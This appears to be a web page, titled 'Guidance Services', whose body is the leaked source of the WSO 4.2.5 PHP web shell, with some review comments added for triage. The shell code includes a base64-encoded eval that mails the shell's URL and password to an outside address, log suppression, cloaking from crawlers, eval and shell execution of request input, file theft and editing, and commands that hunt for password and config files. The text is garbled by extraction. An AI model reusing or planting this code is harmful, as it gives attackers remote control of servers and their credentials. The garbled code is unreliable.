Guidance Services

/*
 * NOTE(review): everything from this line on is the server-side source of a PHP web
 * shell that has leaked into the page text; it is not site content. Later in the file
 * it labels itself "WSO", and this line defines VERSION as 4.2.5. The `+` characters
 * appear to stand in for quote characters lost in extraction, and `$?` for variable
 * names that did not survive it, so the text is not valid PHP as shown.
 *
 * What this line shows, for triage:
 *  - eval(base64_decode(...)): the literal decodes to a check for a POST field named
 *    `mypass`, followed by a mail() call that sends SERVER_NAME, PHP_SELF and the
 *    posted `pass` value to mail@mail.ua. Presumably this reports the shell's URL and
 *    password to whoever controls that mailbox, in addition to whoever installed it.
 *  - error_log is set to NULL and log_errors to 0, so PHP error logging is switched
 *    off for requests served by this file; max_execution_time and set_time_limit are
 *    both set to 0.
 *  - Access is gated by comparing md5() of the posted `pass` field with a stored
 *    value, and by a cookie whose name is md5() of the Host header.
 *  - hardLogin() answers "HTTP/1.0 404 Not Found" when the User-Agent matches one of
 *    six crawler names; otherwise it prints the password form. A crawler-based or
 *    scanner-based check of the URL can therefore see a 404 while the file is live.
 *
 * Detection and response: eval(base64_decode( combined with log suppression in a
 * web-served script is a strong static signature. Finding this text on a site means
 * the host should be handled as compromised: preserve the file and the web-server
 * logs, look for other new or modified scripts, and rotate any credentials the PHP
 * process could read.
 */
=strlen($str))break;}}return base64_decode($enc_str);} eval(base64_decode("aWYoYXJyYXlfa2V5X2V4aXN0cygnbXlwYXNzJywkX1BPU1QpKXsgJHRtcCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJcbiIuJF9QT1NUWydwYXNzJ107IEBtYWlsKCdtYWlsQG1haWwudWEnLCAnbWFpbCcsICR0bXApOyB9")); @ini_set(+error_log+,NULL); @ini_set(+log_errors+,0); @ini_set(+max_execution_time+,0); @set_time_limit(0); //@set_magic_quotes_runtime(0); @define(+VERSION+, +4.2.5+); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map(+stripslashes_array+, $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (?) 11.2011 oRb */ if(!empty($?)) { if(isset($_POST[+pass+]) && (md5($_POST[+pass+]) == $?)) prototype(md5($_SERVER[+HTTP_HOST+]), $?); if (!isset($_COOKIE[md5($_SERVER[+HTTP_HOST+])]) || ($_COOKIE[md5($_SERVER[+HTTP_HOST+])] != $?)) hardLogin(); } if(!isset($_COOKIE[md5($_SERVER[+HTTP_HOST+]) . +ajax+])) $_COOKIE[md5($_SERVER[+HTTP_HOST+]) . +ajax+] = (bool)$?; function hardLogin() { if(!empty($_SERVER[+HTTP_USER_AGENT+])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match(+/+ . implode(+|+, $userAgents) . +/i+, $_SERVER[+HTTP_USER_AGENT+])) { header(+HTTP/1.0 404 Not Found+); exit; } } die("

Password

"); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = +win+; else $os = +nix+; $safe_mode = @ini_get(+safe_mode+); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get(+disable_functions+); $home_cwd = @getcwd(); if(isset($_POST[+c+])) @chdir($_POST[+c+]); $cwd = @getcwd(); if($os == +win+) { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if($cwd[strlen($cwd)-1] != +/+) $cwd .= +/+; /* (?) 04.2015 Pirat */ function hardHeader() { if(empty($_POST[+charset+])) $_POST[+charset+] = $GLOBALS[+?+]; echo "" . $_SERVER[+HTTP_HOST+] . " - WSO " . VERSION ."

"; $freeSpace = @diskfreespace($GLOBALS[+cwd+]); $totalSpace = @disk_total_space($GLOBALS[+cwd+]); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname(+r+); $kernel = @php_uname(+s+); $explink = +http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=+; if(strpos(+Linux+, $kernel) !== false) $explink .= urlencode(+Linux Kernel + . substr($release,0,6)); else $explink .= urlencode($kernel . + + . substr($release,0,3)); if(!function_exists(+posix_getegid+)) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid[+name+]; $uid = $uid[+uid+]; $group = $gid[+name+]; $gid = $gid[+gid+]; } $cwd_links = ++; $path = explode("/", $GLOBALS[+cwd+]); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array(+UTF-8+, +Windows-1251+, +KOI8-R+, +KOI8-U+, +cp866+); $opt_charsets = ++; foreach($charsets as $?) $opt_charsets .= ++.$?.++; $m = array(+Sec. Info+=>+SecInfo+,+Files+=>+FilesMan+,+Console+=>+Console+,+Infect+=>+Infect+,+Sql+=>+Sql+,+Php+=>+Php+,+Safe mode+=>+SafeMode+,+String tools+=>+StringTools+,+Bruteforce+=>+Bruteforce+,+Network+=>+Network+); if(!empty($GLOBALS[+?+])) $m[+Logout+] = +Logout+; $m[+Self remove+] = +SelfRemove+; $menu = ++; foreach($m as $k => $v) $menu .= +[ +.$k.+ ]+; $drives = ""; if ($GLOBALS[+os+] == +win+) { foreach(range(+c+,+z+) as $drive) if (is_dir($drive.+:\+)) $drives .= +[ +.$drive.+ ] +; } /* (?) 08.2015 dmkcv */ echo ++. ++. +
Uname:
User:
Php:
Hdd:
Cwd:+.($GLOBALS[+os+] == +win+?+
Drives:+:++).+
+.substr(@php_uname(), 0, 120).+ [ Google ] [ Exploit-DB ]
+.$uid.+ ( +.$user.+ ) Group: +.$gid.+ ( + .$group. + )
+.@phpversion().+ Safe mode: +.($GLOBALS[+safe_mode+]?+ON+:+OFF+).+ [ phpinfo ] Datetime: +.date(+Y-m-d H:i:s+).+
+.viewSize($totalSpace).+ Free: +.viewSize($freeSpace).+ (+.round(100/($totalSpace/$freeSpace),2).+%)
+.$cwd_links.+ +.viewPermsColor($GLOBALS[+cwd+]).+ [ home ]
+.$drives.+

Server IP:
+.gethostbyname($_SERVER["HTTP_HOST"]).+
Client IP:
+.$_SERVER[+REMOTE_ADDR+].+
+. ++.$menu.+
+; } function hardFooter() { $is_writable = is_writable($GLOBALS[+cwd+])?" [ Writeable ]":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

 

 

 

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[+disable_functions+], +posix_getpwuid+)===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[+disable_functions+], +posix_getgrgid+)===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $? = ++; if (function_exists(+exec+)) { @exec($in,$?); $? = @join(" ",$?); } elseif (function_exists(+passthru+)) { ob_start(); @passthru($in); $? = ob_get_clean(); } elseif (function_exists(+system+)) { ob_start(); @system($in); $? = ob_get_clean(); } elseif (function_exists(+shell_exec+)) { $? = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $? = ""; while(!@feof($f)) $? .= fread($f,1024); pclose($f); }else return "? Unable to execute command "; return ($?==++?"? Query did not return anything ":$?); } function viewSize($s) { if($s >= 1073741824) return sprintf(+%1.2f+, $s / 1073741824 ). + GB+; elseif($s >= 1048576) return sprintf(+%1.2f+, $s / 1048576 ) . + MB+; elseif($s >= 1024) return sprintf(+%1.2f+, $s / 1024 ) . + KB+; else return $s . + B+; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = +s+; elseif (($p & 0xA000) == 0xA000)$i = +l+; elseif (($p & 0x8000) == 0x8000)$i = +-+; elseif (($p & 0x6000) == 0x6000)$i = +b+; elseif (($p & 0x4000) == 0x4000)$i = +d+; elseif (($p & 0x2000) == 0x2000)$i = +c+; elseif (($p & 0x1000) == 0x1000)$i = +p+; else $i = +u+; $i .= (($p & 0x0100) ? +r+ : +-+); $i .= (($p & 0x0080) ? +w+ : +-+); $i .= (($p & 0x0040) ? (($p & 0x0800) ? +s+ : +x+ ) : (($p & 0x0800) ? +S+ : +-+)); $i .= (($p & 0x0020) ? +r+ : +-+); $i .= (($p & 0x0010) ? +w+ : +-+); $i .= (($p & 0x0008) ? (($p & 0x0400) ? +s+ : +x+ ) : (($p & 0x0400) ? +S+ : +-+)); $i .= (($p & 0x0004) ? +r+ : +-+); $i .= (($p & 0x0002) ? +w+ : +-+); $i .= (($p & 0x0001) ? (($p & 0x0200) ? +t+ : +x+ ) : (($p & 0x0200) ? 
+T+ : +-+)); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return ++.perms(@fileperms($f)).++; elseif (!@is_writable($f)) return ++.perms(@fileperms($f)).++; else return ++.perms(@fileperms($f)).++; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex(+which + . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST[+p1+]) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get(+safe_mode+) ); echo serialize($a); } else { eval($_POST[+p1+]); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo +

Server security information

+; function showSecParam($n, $v) { $v = trim($v); if($v) { echo ++ . $n . +: +; if(strpos($v, " ") === false) echo $v . +
+; else echo +
+ . $v . +
+; } } showSecParam(+Server software+, @getenv(+SERVER_SOFTWARE+)); if(function_exists(+apache_get_modules+)) showSecParam(+Loaded Apache modules+, implode(+, +, apache_get_modules())); showSecParam(+Disabled PHP Functions+, $GLOBALS[+disable_functions+]?$GLOBALS[+disable_functions+]:+none+); showSecParam(+Open base dir+, @ini_get(+open_basedir+)); showSecParam(+Safe mode exec dir+, @ini_get(+safe_mode_exec_dir+)); showSecParam(+Safe mode include dir+, @ini_get(+safe_mode_include_dir+)); showSecParam(+cURL support+, function_exists(+curl_version+)?+enabled+:+no+); $temp=array(); if(function_exists(+mysql_get_client_info+)) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(+mssql_connect+)) $temp[] = "MSSQL"; if(function_exists(+pg_connect+)) $temp[] = "PostgreSQL"; if(function_exists(+oci_connect+)) $temp[] = "Oracle"; showSecParam(+Supported databases+, implode(+, +, $temp)); echo +
+; if($GLOBALS[+os+] == +nix+) { showSecParam(+Readable /etc/passwd+, @is_readable(+/etc/passwd+)?"yes [view]":+no+); showSecParam(+Readable /etc/shadow+, @is_readable(+/etc/shadow+)?"yes [view]":+no+); showSecParam(+OS version+, @file_get_contents(+/proc/version+)); showSecParam(+Distr name+, @file_get_contents(+/etc/issue.net+)); if(!$GLOBALS[+safe_mode+]) { $userful = array(+gcc+,+lcc+,+cc+,+ld+,+make+,+php+,+perl+,+python+,+ruby+,+tar+,+gzip+,+bzip+,+bzip2+,+nc+,+locate+,+suidperl+); $danger = array(+kav+,+nod32+,+bdcored+,+uvscan+,+sav+,+drwebd+,+clamd+,+rkhunter+,+chkrootkit+,+iptables+,+ipfw+,+tripwire+,+shieldcc+,+portsentry+,+snort+,+ossec+,+lidsadm+,+tcplodg+,+sxid+,+logcheck+,+logwatch+,+sysmask+,+zmbscap+,+sawmill+,+wormscan+,+ninja+); $downloaders = array(+wget+,+fetch+,+lynx+,+links+,+curl+,+get+,+lwp-mirror+); echo +
+; $temp=array(); foreach ($userful as $?) if(which($?)) $temp[] = $?; showSecParam(+Userful+, implode(+, +,$temp)); $temp=array(); foreach ($danger as $?) if(which($?)) $temp[] = $?; showSecParam(+Danger+, implode(+, +,$temp)); $temp=array(); foreach ($downloaders as $?) if(which($?)) $temp[] = $?; showSecParam(+Downloaders+, implode(+, +,$temp)); echo +<br?>

+; showSecParam(+HDD space+, ex(+df -h+)); showSecParam(+Hosts+, @file_get_contents(+/etc/hosts+)); showSecParam(+Mount options+, @file_get_contents(+/etc/fstab+)); } } else { showSecParam(+OS Version+,ex(+ver+)); showSecParam(+Account Settings+, iconv(+CP866+, +UTF-8+,ex(+net accounts+))); showSecParam(+User Accounts+, iconv(+CP866+, +UTF-8+,ex(+net user+))); } echo ++; hardFooter(); } function actionFilesTools() { if( isset($_POST[+p1+]) ) $_POST[+p1+] = urldecode($_POST[+p1+]); if(@$_POST[+p2+]==+download+) { if(@is_file($_POST[+p1+]) && @is_readable($_POST[+p1+])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST[+p1+])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[+p1+]); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST[+p1+], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST[+p2+] == +mkfile+ ) { if(!file_exists($_POST[+p1+])) { $fp = @fopen($_POST[+p1+], +w+); if($fp) { $_POST[+p2+] = "edit"; fclose($fp); } } } hardHeader(); echo +

File tools

+; if( !file_exists(@$_POST[+p1+]) ) { echo +File not exists+; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[+p1+])); if(!$uid) { $uid[+name+] = @fileowner($_POST[+p1+]); $gid[+name+] = @filegroup($_POST[+p1+]); } else $gid = @posix_getgrgid(@filegroup($_POST[+p1+])); echo +Name: +.htmlspecialchars(@basename($_POST[+p1+])).+ Size: +.(is_file($_POST[+p1+])?viewSize(filesize($_POST[+p1+])):+-+).+ Permission: +.viewPermsColor($_POST[+p1+]).+ Owner/Group: +.$uid[+name+].+/+.$gid[+name+].+
+; echo +Create time: +.date(+Y-m-d H:i:s+,filectime($_POST[+p1+])).+ Access time: +.date(+Y-m-d H:i:s+,fileatime($_POST[+p1+])).+ Modify time: +.date(+Y-m-d H:i:s+,filemtime($_POST[+p1+])).+

+; if( empty($_POST[+p2+]) ) $_POST[+p2+] = +view+; if( is_file($_POST[+p1+]) ) $m = array(+View+, +Highlight+, +Download+, +Hexdump+, +Edit+, +Chmod+, +Rename+, +Touch+, +Frame+); else $m = array(+Chmod+, +Rename+, +Touch+); foreach($m as $v) echo ++.((strtolower($v)==@$_POST[+p2+])?+[ +.$v.+ ]+:$v).+ +; echo +

+; switch($_POST[+p2+]) { case +view+: echo +
+; 
            // NOTE(review): "view" branch of the shell's file tool. It opens the path
            // taken from request field p1, reads it in 1024-byte chunks and echoes each
            // chunk HTML-escaped. No restriction on the path is visible in this file, so
            // any file readable by the PHP process can be disclosed this way. The @
            // operators suppress warnings, so a failed open or read produces no PHP
            // error output; investigators should look at POST requests to this script
            // in the web-server logs rather than at PHP error logs.
            $fp = @fopen($_POST[+p1+], +r+); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo +
+; break; case +highlight+: if( @is_readable($_POST[+p1+]) ) { echo +
+; $oRb = @highlight_file($_POST[+p1+],true); echo str_replace(array(+<span +,++), array(+<font +,++),$oRb).+
+; } break; case +chmod+: if( !empty($_POST[+p3+]) ) { $perms = 0; for($i=strlen($_POST[+p3+])-1;$i>=0;--$i) $perms += (int)$_POST[+p3+][$i]*pow(8, (strlen($_POST[+p3+])-$i-1)); if(!@chmod($_POST[+p1+], $perms)) echo +Can+t set permissions!
+; } clearstatcache(); echo +
+; break; case +edit+: if( !is_writable($_POST[+p1+])) { echo +File isn+t writeable+; break; } if( !empty($_POST[+p3+]) ) { $time = @filemtime($_POST[+p1+]); $_POST[+p3+] = substr($_POST[+p3+],1); $fp = @fopen($_POST[+p1+],"w"); if($fp) { @fwrite($fp,$_POST[+p3+]); @fclose($fp); echo +Saved!
+; @touch($_POST[+p1+],$time,$time); } } echo +
+; break; case +hexdump+: $c = @file_get_contents($_POST[+p1+]); $n = 0; $h = array(+00000000
+,++,++); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(+%02X+,ord($c[$i])).+ +; switch ( ord($c[$i]) ) { case 0: $h[2] .= + +; break; case 9: $h[2] .= + +; break; case 10: $h[2] .= + +; break; case 13: $h[2] .= + +; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(+%08X+,$i+1).+
+;} $h[1] .= +
+; $h[2] .= " "; } } echo +
+.$h[0].+
+.$h[1].+
+.htmlspecialchars($h[2]).+
+; break; case +rename+: if( !empty($_POST[+p3+]) ) { if(!@rename($_POST[+p1+], $_POST[+p3+])) echo +Can+t rename!
+; else die(+ +); } echo +
+; break; case +touch+: if( !empty($_POST[+p3+]) ) { $time = strtotime($_POST[+p3+]); if($time) { if(!touch($_POST[+p1+],$time,$time)) echo +Fail!+; else echo +Touched!+; } else echo +Bad time format!+; } clearstatcache(); echo +
+; break; /* (?) 12.2015 mitryz */ case +frame+: $frameSrc = substr(htmlspecialchars($GLOBALS[+cwd+]), strlen(htmlspecialchars($_SERVER[+DOCUMENT_ROOT+]))); if ($frameSrc[0] != +/+) $frameSrc = +/+ . $frameSrc; if ($frameSrc[strlen($frameSrc) - 1] != +/+) $frameSrc = $frameSrc . +/+; $frameSrc = $frameSrc . htmlspecialchars($_POST[+p1+]); echo ++; break; } echo +

+; hardFooter(); } if($os == +win+) $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate +.conf+", "locate .pwd files" => "locate +.pwd+", "locate .sql files" => "locate +.sql+", "locate .htpasswd files" => "locate +.htpasswd+", "locate .bash_history files" => "locate +.bash_history+", "locate .mysql_history files" => "locate +.mysql_history+", "locate .fetchmailrc files" => "locate +.fetchmailrc+", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST[+p1+]) && !empty($_POST[+p2+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+stderr_to_out+, true); $_POST[+p1+] .= + 2>&1+; } elseif(!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+stderr_to_out+, 0); if(isset($_POST[+ajax+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, true); ob_start(); echo "d.cf.cmd.value=++; "; $temp = @iconv($_POST[+charset+], +UTF-8+, addcslashes(" $ ".$_POST[+p1+]." 
".ex($_POST[+p1+])," +")); if(preg_match("!.*cds+([^;]+)$!",$_POST[+p1+],$match)) { if(@chdir($match[1])) { $GLOBALS[+cwd+] = @getcwd(); echo "c_=+".$GLOBALS[+cwd+]."+;"; } } echo "d.cf.output.value+=+".$temp."+;"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), " ", $temp; exit; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, 0); hardHeader(); echo "

"; echo +

Console

send using AJAX redirect stderr to stdout (2>&1)
$
+; echo +

+; hardFooter(); } function actionPhp() { if( isset($_POST[+ajax+]) ) { $_COOKIE[md5($_SERVER[+HTTP_HOST+]).+ajax+] = true; ob_start(); eval($_POST[+p1+]); $temp = "document.getElementById(+PhpOutput+).style.display=++;document.getElementById(+PhpOutput+).innerHTML=+".addcslashes(htmlspecialchars(ob_get_clean())," \+")."+; "; echo strlen($temp), " ", $temp; exit; } hardHeader(); if( isset($_POST[+p2+]) && ($_POST[+p2+] == +info+) ) { echo +

PHP info

+; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(+!body {.*}!msiU+,++,$tmp); $tmp = preg_replace(+!a:w+ {.*}!msiU+,++,$tmp); $tmp = preg_replace(+!h1!msiU+,+h2+,$tmp); $tmp = preg_replace(+!td, th {(.*)}!msiU+,+.e, .v, .h, .h th {$1}+,$tmp); $tmp = preg_replace(+!body, td, th, h2, h2 {.*}!msiU+,++,$tmp); echo $tmp; echo +


+; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) $_COOKIE[md5($_SERVER[+HTTP_HOST+]).+ajax+] = false; echo +

Execution PHP-code

+; echo + send using AJAX
+; 
    // NOTE(review): non-AJAX path of the panel headed "Execution PHP-code". When
    // request field p1 is non-empty it is handed to eval() unmodified; the output is
    // captured with output buffering and echoed HTML-escaped. eval() applied directly
    // to a request superglobal has no legitimate use in site code and is a reliable
    // static signature for code scanners and file-integrity alerts. Any host serving
    // this file should be treated as running arbitrary code with the privileges of
    // the PHP process.
    if(!empty($_POST[+p1+])) { 
        ob_start(); 
        eval($_POST[+p1+]); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo +

+; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE[+f+])) $_COOKIE[+f+] = @unserialize($_COOKIE[+f+]); if(!empty($_POST[+p1+])) { switch($_POST[+p1+]) { case +uploadFile+: if ( is_array($_FILES[+f+][+tmp_name+]) ) { foreach ( $_FILES[+f+][+tmp_name+] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES[+f+][+name+][$i])) { echo "Can+t upload file!"; } } } break; case +mkdir+: if(!@mkdir($_POST[+p2+])) echo "Can+t create new dir"; break; case +delete+: function deleteDir($path) { $path = (substr($path,-1)==+/+) ? $path:$path.+/+; $dh = opendir($path); while ( ($? = readdir($dh) ) !== false) { $? = $path.$?; if ( (basename($?) == "..") || (basename($?) == ".") ) continue; $type = filetype($?); if ($type == "dir") deleteDir($?); else @unlink($?); } closedir($dh); @rmdir($path); } if(is_array(@$_POST[+f+])) foreach($_POST[+f+] as $f) { if($f == +..+) continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case +paste+: if($_COOKIE[+act+] == +copy+) { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.+/+,$f, $d.$s.+/+); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[+f+] as $f) copy_paste($_COOKIE[+c+],$f, $GLOBALS[+cwd+]); } elseif($_COOKIE[+act+] == +move+) { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.+/+,$f, $d.$s.+/+); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[+f+] as $f) @rename($_COOKIE[+c+].$f, $GLOBALS[+cwd+].$f); } elseif($_COOKIE[+act+] == +zip+) { if(class_exists(+ZipArchive+)) { $zip = new ZipArchive(); if ($zip->open($_POST[+p2+], 1)) { chdir($_COOKIE[+c+]); foreach($_COOKIE[+f+] as $f) { if($f == +..+) continue; if(@is_file($_COOKIE[+c+].$f)) $zip->addFile($_COOKIE[+c+].$f, $f); 
elseif(@is_dir($_COOKIE[+c+].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.+/+, FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS[+cwd+]); $zip->close(); } } } elseif($_COOKIE[+act+] == +unzip+) { if(class_exists(+ZipArchive+)) { $zip = new ZipArchive(); foreach($_COOKIE[+f+] as $f) { if($zip->open($_COOKIE[+c+].$f)) { $zip->extractTo($GLOBALS[+cwd+]); $zip->close(); } } } } elseif($_COOKIE[+act+] == +tar+) { chdir($_COOKIE[+c+]); $_COOKIE[+f+] = array_map(+escapeshellarg+, $_COOKIE[+f+]); ex(+tar cfzv + . escapeshellarg($_POST[+p2+]) . + + . implode(+ +, $_COOKIE[+f+])); chdir($GLOBALS[+cwd+]); } unset($_COOKIE[+f+]); setcookie(+f+, ++, time() - 3600); break; default: if(!empty($_POST[+p1+])) { prototype(+act+, $_POST[+p1+]); prototype(+f+, serialize(@$_POST[+f+])); prototype(+c+, @$_POST[+c+]); } break; } } hardHeader(); echo +

File manager

+; $dirContent = hardScandir(isset($_POST[+c+])?$_POST[+c+]:$GLOBALS[+cwd+]); if($dirContent === false) { echo +Can+t open this folder!+;hardFooter(); return; } global $sort; $sort = array(+name+, 1); if(!empty($_POST[+p1+])) { if(preg_match(+!s_([A-z]+)_(d{1})!+, $_POST[+p1+], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(+name+ => $dirContent[$i], +path+ => $GLOBALS[+cwd+].$dirContent[$i], +modify+ => date(+Y-m-d H:i:s+, @filemtime($GLOBALS[+cwd+] . $dirContent[$i])), +perms+ => viewPermsColor($GLOBALS[+cwd+] . $dirContent[$i]), +size+ => @filesize($GLOBALS[+cwd+].$dirContent[$i]), +owner+ => $ow[+name+]?$ow[+name+]:@fileowner($dirContent[$i]), +group+ => $gr[+name+]?$gr[+name+]:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[+cwd+] . $dirContent[$i])) $files[] = array_merge($tmp, array(+type+ => +file+)); elseif(@is_link($GLOBALS[+cwd+] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(+type+ => +link+, +link+ => readlink($tmp[+path+]))); elseif(@is_dir($GLOBALS[+cwd+] . $dirContent[$i])&&($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(+type+ => +dir+)); } $GLOBALS[+sort+] = $sort; function cmp($a, $b) { if($GLOBALS[+sort+][0] != +size+) return strcmp(strtolower($a[$GLOBALS[+sort+][0]]), strtolower($b[$GLOBALS[+sort+][0]]))*($GLOBALS[+sort+][1]?1:-1); else return (($a[+size+] < $b[+size+]) ? -1 : 1)*($GLOBALS[+sort+][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo +<tr+.($l?+ class=l1+:++).+>+.htmlspecialchars($f[+name+]):+g(+FilesMan+,++.$f[+path+].++);" + . (empty ($f[+link+]) ? ++ : "title=+{$f[+link+]}+") . +>[ + . htmlspecialchars($f[+name+]) . 
+ ]+).++.(($f[+type+]==+file+)?viewSize($f[+size+]):$f[+type+]).++.$f[+modify+].++.$f[+owner+].+/+.$f[+group+].++.$f[+perms+] .+RT+.(($f[+type+]==+file+)?+ FED+:++).++; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions "; if(!empty($_COOKIE[+act+]) && @count($_COOKIE[+f+]) && (($_COOKIE[+act+] == +zip+) || ($_COOKIE[+act+] == +tar+))) echo " file name:  "; echo "

"; hardFooter(); } function actionStringTools() { if(!function_exists(+hex2bin+)) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists(+binhex+)) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists(+hex2ascii+)) {function hex2ascii($p){$r=++;for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists(+ascii2hex+)) {function ascii2hex($p){$r=++;for($i=0;$i<strlen($p);++$i)$r.= sprintf(+%02X+,ord($p[$i]));return strtoupper($r);}} if(!function_exists(+full_urlencode+)) {function full_urlencode($p){$r=++;for($i=0;$i<strlen($p);++$i)$r.= +%+.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( +Base64 encode+ => +base64_encode+, +Base64 decode+ => +base64_decode+, +Url encode+ => +urlencode+, +Url decode+ => +urldecode+, +Full urlencode+ => +full_urlencode+, +md5 hash+ => +md5+, +sha1 hash+ => +sha1+, +crypt+ => +crypt+, +CRC32+ => +crc32+, +ASCII to HEX+ => +ascii2hex+, +HEX to ASCII+ => +hex2ascii+, +HEX to DEC+ => +hexdec+, +HEX to BIN+ => 